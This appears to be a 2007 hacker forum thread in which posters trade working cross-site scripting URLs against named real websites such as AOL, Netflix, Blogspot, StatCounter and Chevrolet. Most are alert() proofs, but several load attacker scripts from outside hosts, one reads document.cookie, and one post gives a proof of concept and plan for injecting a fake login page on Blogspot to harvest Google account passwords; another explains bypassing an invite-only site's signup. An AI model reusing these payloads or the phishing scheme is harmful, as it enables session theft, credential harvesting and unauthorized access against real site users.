http://www.statcounter.com/help/knowledge_base/search_knowledge_base.php?seachtext="><script>alert('xss')</script>



Edited 1 time(s). Last edit at 01/18/2007 03:09AM by malorn.

malorn Wrote:
-------------------------------------------------------
> http://www.statcounter.com/help/knowledge_base/sea
> rch_knowledge_base.php?seachtext=">alert('xss')

http://www.statcounter.com/help/knowledge_base/search_knowledge_base.php?seachtext=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E

As for the fact that Easy discovered that, I see his 1 exploit and I raise him 8 =P
Linkage: http://www.rawrcore.net/?p=9

^^ All my discoveries as far as I know ^^

2600 website: http://www.2600.com/cgi-bin/covers.pl?issue=2.gif%22%3E%3C/a%3E%3Cscript%3Ealert(%22Xss%22)%3C/script%3E



Edited 2 time(s). Last edit at 01/18/2007 05:14PM by Patchy.

lol at 2600.. although it probably doesn't have much practical use, it's still amusing to see.

-maluc

http://www.lyricsfreak.com/search.php?q=%3Cscript%20src=http://rgaucher.info/p.js%3E

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher

http://service.spiegel.de/digas/servlet/find?S=%22%2Balert%28%22XSS%22%29%2B%22%5C%22

This page does some weird escaping, e.g. brackets in the date fields are escaped - but not if you put a quotation mark there as well.

http://www.heise.de/fastbin/heisejobs/schnellsuche.pl?such_text=test%20OR%20%27%3E%3Cscript%20src=%22http://ha.ckers.org/xss.js%22%3E%3C/script%3E%3C%27

http://www.focus.de/videos/'+alert('XSS')+'

http://television.aol.com/?zip=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E
http://television.aol.com/?zip=';alert(/xss/);//

http://www.chip.de/artikel/c1_artikel_13626342.html?data%5BEMail%5D=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3C%22&action=neuanmeldung_doit

idk if this one's been posted yet or not, probably has... but im just trying to stay away from aol :X
http://www.tmz.com/search/?q=%22%3E%3Cscript%3Ealert(/xss/);%3C/script%3E

http://www.bloglines.com/login?r=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E

http://www.pcwelt.de/index.cfm?action=extendedsearch&query=&pid=930&yeardateto=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3C%22

http://www.zdnet.de/suchen/index.htm?query=%22%3E%3C%2Fiframe%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3C%22

http://afisha.yandex.ru/search/?city=MSK&text=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3C%22

http://lokales.suche.gmx.net/YM/Poi/Poi.aspx?Catchword=%22+onmouseover%3D%22alert%28%27XSS%27%29

http://www.putfile.com/cat.php?cat=%22%3E%3C/a%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Only Firefox:
http://games-suche.gmx.de/spiele.html?q=%22%3Cscript%3C%21--%0Aalert%28%22XSS%22%29%3C%2Fscript+a%3D%22&c=

http://www.torg.ru/catalog/search.php?price_from=%22%3E%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2Fscript%3E%3C%22

Only Firefox: http://soft.mail.ru/search_result_header.php?words=%22+style%3D-moz-binding%3Aurl%28http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%29+%22

good to see some new poster

-id

Irony, thy name is XSS

http://www.ic3.gov/search.aspx?q=%3Cscript%3Ealert(%22Oh%20the%20cruel%20irony%22);%3C/script%3E

www.rawrcore.net plz <3

-Lockdown-

http://www.rawrcore.net

http://www.search.com/search?q=%27%7Dalert%28%27XSS%27%29%3B%7B%27asdfasfsfasd - have to click "search within these results"

A better one: http://www.search.com/search?q.lit=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&adv=1&channel=1

Advanced search has no filtering whatsoever.

Okay this was hurrendous, after finding xss in blogspot the other day in kuza55's profile, i sound discovered it was a site wide issue and effected alot more people than kuza55, the xss is in the search tag. for example

http://domain.blogspot.com/search?q=%3C%2Ftitle%3E%3Cscript%3Ealert%28%27hi%27%29%3C%2Fscript%3E

i thought i'd create an account and enter a 'blog entry' to see what was filtered, i started with the obvious, <script>alert('hi')</script>, which returned the error the tag <script> is not allowed, so i then tried <iframe>, <frameset>, <body> etc... all where disallowed, i then saw that it was possible to insert pictures into the blog, so i tried img src=javascript:alert('hi') which worked fine, but only in internet explorer, i then began testing to see which i could get working in firefox, and after having a quick refer to the cheat sheet i used the xml moz-binding, so on my profile i now xss working regardless of browser, i really thought on such a major site that it would have been alot more secure than this. Especially as a worm on a site of this nature would do alot of damage.

Anyway - the url is http://eyeced.blogspot.com - i would'nt go checking there for blogs though, as the only reason i created it was simply for testing.

Edit: this would be a way of easily harvesting google mail password's aswell from the masses that use blogspot.

PoC - <IMG SRC="javascript:x=document.createElement('script');x.src='http//fakebloggerlogin';document.body.appendChild(x);">

the fakebloggerlogin page would simply be a page on your server to which the user would be non the wiser, he/she would sign in, there details would then be posted to your server, then they could be re-directed to the page they should have originally been sent to. Or if you want to make it look amazingly real, you could even use there details to log them in, and take them to the logged in page...



Edited 1 time(s). Last edit at 01/19/2007 09:36AM by eyeced.

http://www.zippyvideos.com/video_search.z?q=%22%3E%3Cscript%3Ealert(/xss/);%3C/script%3E&x=0&y=0

https://www.stubhub.com/?gSec=login&nameLogin=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E

Another ScanAlert - HackerSafe website



Edited 1 time(s). Last edit at 01/20/2007 09:34PM by malorn.

I've been away for the past 8 days so I missed this, but the good thing about blogger is that it implements defence in depth rather well, because all the actual editing and authentication occurs (as far as I can tell) on the blogger.com domain, and no authentication cookies or anything are stored on the blogspot.com domain, and therefore the exploit doesn't really get you anything other than the ability to fake content, which (at least for me) isn't too worrying.

If on the other hand you manage to find an XSS flaw on the blogger.com domain, then it'll be a very serious issue.

http://www.doostang.com/sign_up2.asp?fid=46221&nzap=76145&act=2&uname=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E

Apparently this is some new social networking site by Stanford and MIT alumns. What is really funny is this is an invite only network. A simple modification of the fid and nzap numbers and you can get yourself in via some person you don't even know (like the above link).

So sign yourself up and get an account if you'd like ;)

http://www.chevrolet.com/search/SearchServer/wwwtemplates/index.jsp?query=%22%3E%3C%2Fiframe%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E

http://www-5.jeep.com/webselfservice/jeep/index.jsp?screenName=customer')%22%3E%3Cscript%3Ealert('xss')%3C/script%3E&country=us&emailUrl=goToEmailForm%28%27R%27%29



Edited 1 time(s). Last edit at 01/21/2007 03:27AM by malorn.

http://jobs.netflix.com/applyFlix.asp?act=dologin&cocode=flix&email=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E

Netflix =0

-Lockdown-

http://www.rawrcore.net